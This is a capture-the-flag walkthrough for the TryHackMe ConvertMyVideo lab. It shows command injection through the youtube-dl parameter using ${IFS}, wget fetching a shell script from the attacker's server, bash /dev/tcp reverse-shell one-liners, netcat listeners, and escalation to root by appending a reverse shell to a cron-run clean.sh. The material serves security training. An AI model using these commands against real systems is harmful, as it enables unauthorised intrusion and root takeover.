ConvertMyVideo THM
IP
10.10.53.160initial Nmap scan
sudo nmap -sV -sC -A -oA inital_nmap 10.10.53.160
full Nmap scan
nmap -T5 -p- -oA full_nmap 10.10.53.160Ports
22: SSH
80 HTTP Apache 2.4.29
Port 80 HTTP
when we navigate over to http://10.10.53.160 we are greeted with the following
Lets perform some directory busting and see if we can find any hidden directories
feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.53.160:80 -o dirs.txt
within the feroxbuster's results, we do find a
/admindirectory:when we navigate over to the admin directory we are instructed to give a username and password, default creds didn't seem to work
Let's focus on the convertmyvideo function on the home page
we can try some command injection and catch the request through burp to see what is happening
Within our proxy let's send it over to repeater
When we send the request through repeater we can see we are getting an error sent back to us
Lets google the error results and see if this can bring anymore context
from our google search we can see the application uses
youtube-dl is a command-line program to download videos from youtube,
Looking through the repo we can see that youtube-dl does allow commands to be passed through
we can perform command injection!
we are getting some results back, perhaps we can upload a bash shell and establish a reverse shell
for our bash scripts
bash -i >& /dev/tcp/10.14.45.1/9001 0>&1well place this in rev.sh and upload it to the target machine
let's start our Python server
python3 -m http.server 8081Now we can use burp to alter our request to the server and use wget on the target machine to download our script,
when adjusting the request I noticed replacing the white space with %20 didn't seem to work trying but ${IFS} seemed to work perfectly for white spaces
we can see the target machine downloaded our script
Now we need to set up our netcat listener
nc -lvnp 9001from burp again we want to run our script on our target machine
Now we have a shell on the target
Privilege escalation via www-data
First, we want to stabilize our shell we can use python for this
python3 -c "import pty;pty.spawn('/bin/bash')"From our directory busting we know there is an admin directory, not much to do off other then the user flag
lets start enumerating the system
os
cat /etc/os-release
Kernal information
cat /proc/version
using searchsploit we found a couple of exploits we could use if gcc was installed on the target which it is not
SUID files
find / -type f -perm -04000 -ls 2>/dev/nullnothing interesting
Cron jobs
ls -al /etc/cron* /etc/at*
crontab -lnothing interesting
processes running as root
ps aux | grep root
We can see cron is running but we dont have a lot of information regarding the processes
Let's download pspy to see if any users are running commands on the target machine.
copy pspy into your working directory
cp /opt/pspy64 .start a python server in your working directory
python3 -m http.server 8081on our target machine let's use wget to download the file, dont forget to cd into your tmp directory
cd /tmp && wget http://10.14.45.1:8081/pspy64give pspy64 execute permission
chmod +x pspy64now lets run it
./pspy64we do find
/bin/sh -c cd /var/www/html/tmp && bash /var/www/html/tmp/clean.sh being run meaning we could modify the file and generate a shell
lets create another reverse shell by appending our bash one-liner so it executes as root
echo "bash -i >& /dev/tcp/10.14.45.1/9002 0>&1" >> /var/www/html/tmp/clean.sh
start our netcat listener
nc -lvnp 9002Now we wait for the file to execute
Now we are root
Last updated